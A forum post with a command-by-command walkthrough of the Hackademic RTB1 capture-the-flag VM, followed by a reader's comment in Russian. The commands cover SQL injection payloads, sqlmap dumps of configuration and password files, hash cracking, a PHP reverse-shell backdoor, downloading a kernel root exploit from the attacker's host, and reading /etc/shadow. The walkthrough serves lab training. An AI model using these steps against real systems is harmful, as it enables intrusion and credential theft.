Видео Method: ✔ Scanned network for the target [Netdiscover] ✔ Port scanned the target [UnicornScan] ✔ Banner grabbed the services running on the open port(s) [NMap] ✔ Interacted with the web server & enumerated the web application [Firefox & WPScan] ✔ Discovered & exploit an SQL injection vulnerably and download the configuration files [Exploit-DB & SQLMap] ✔ Brute Force the user credentials for the web application [John The Ripper] ✔ Hijacked a plugin for the the web application with a web shell backdoor [Pentestmonkey’s Php-Reverse-Shell] ✔ Escalated privileges via a vulnerable kernel version [RDS Protocol exploit] ✔ Accessed the ‘flag’ [Text file] ✔ Discovered other ‘interesting files’ [Forensics analysis?] Commands PHP: netdiscover -r 192.168.0.1/24 us -H -msf -Iv 192.168.0.130 -p 1-65535 && us -H -mU -Iv 192.168.0.130 -p 1-65535 nmap -p 1-65535 -T4 -A -v 192.168.0.130 # -p 80 // firefox -> 192.168.0.130 -> Target (/Hackademic_RTB1/) -> Right click -> View source # WordPress 1.5.1.1 apt-cache show wpscan apt-get install wpscan cd /pentest/web/wpscan/ ./wpscan.rb ./wpscan.rb --url http://192.168.0.130/Hackademic_RTB1/ cd /pentest/exploits/exploitdb/ cat files.csv | grep -i wordpress | grep 1.5.1 perl platforms/php/webapps/1033.pl perl platforms/php/webapps/1033.pl http://192.168.0.130/Hackademic_RTB1 2 cat platforms/php/webapps/1033.pl // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0' // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 1 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 2 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 3 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 4 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 5 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 6 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,2,3,4,5 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,version(),3,4,5 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,user(),3,4,5 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,database(),3,4,5 // http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,load_file(/etc/passwd),3,4,5 echo -n /etc/passwd | xxd -p - http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,load_file(0x2f6574632f706173737764),3,4,5 cd /pentest/database/sqlmap/ ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/etc/passwd cat /pentest/database/sqlmap/output/192.168.0.130/files/_etc_passwd ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --banner --current-db --current-user --is-dba ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --dbs ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --dbs ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --tables -v 0 ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 -D mysql --columns -v 0 ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --password -v 0 ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/etc/httpd/conf/httpd.conf cat /pentest/database/sqlmap/output/192.168.0.130/files/_etc_httpd_conf_httpd.conf | grep DocumentRoot ./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/var/www/html/Hackademic_RTB1/wp-config.php cat /pentest/database/sqlmap/output/192.168.0.130/files/_var_www_html_Hackademic_RTB1_wp-config.php #firefox sqlhack.com -> crack a MySQL pass in 1 minute -> SQl Hack Proof-of-Concept # wget http://sqlhack.com/poc.c cd /pentest/passwords/john ./john ./john /tmp/crackme --wordlist=/tmp/pass --format=MYSQL #./john /tmp/crackme --show firefox wordpress.org -> Database_Description -> WordPress 1.5 # http://codex.wordpress.org/Database_Description/1.5 http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,count(*),3,4,5 from wp_users http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users | grep page | sed 's/.*;\(.*\)&.*//' for x in $(seq 1 6); do curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass,0x3a,user_level%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep page | sed 's/.*;\(.*\)&.*//'; done # Could even use the first SQL injection for count for x in $(seq 1 6); do curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep page | sed 's/.*;\(.*\)&.*//' >> /tmp/wordpress; done cd /pentest/password/john ./john /tmp/crack --wordlist=/pentest/passwords/wordlists/darkc0de.lst --format=raw-MD5 http://192.168.0.130/Hackademic_RTB1/wp-admin/ # GeorgeMiller // q1w2e3 #Plugins -> Hello Dolly -> Actiavte. Manage -> Files -> textile1.php cd /pentest/backdoors/web/webshells/ cat php-reverse-shell.php # Edit IP & port nc -lvvp 443 curl http://192.168.0.130/Hackademic_RTB1/wp-content/plugins/textile1.php; exit uname -a cd /pentest/exploits/exploitdb cat files.csv | grep "linux,local" | grep "Local Privilege Escalation" head platforms/linux/local/15285.c cp platforms/linux/local/15285.c /var/www/ nano /var/www/15285.c # add "//" on line 1 chmod +x /var/www/15285.c /etc/init.d/apache2 start cd /tmp wget 192.168.0.162/15285.c -O root.c gcc root.c -o root ./root id ifconfig && uname -a && cat /etc/shadow && ls -lAh /root cat /root/key.txt #cat /root/.bash_history #ls -lAh /root/.local/share/Trash/files
порутали быстро,а вотна видео доставать логен и пасс админа через скулю 12 минут,ну помойму не айс. п.с. а что за плаген к браузеру %20 дурацкие символы убирал с адрессной строки?
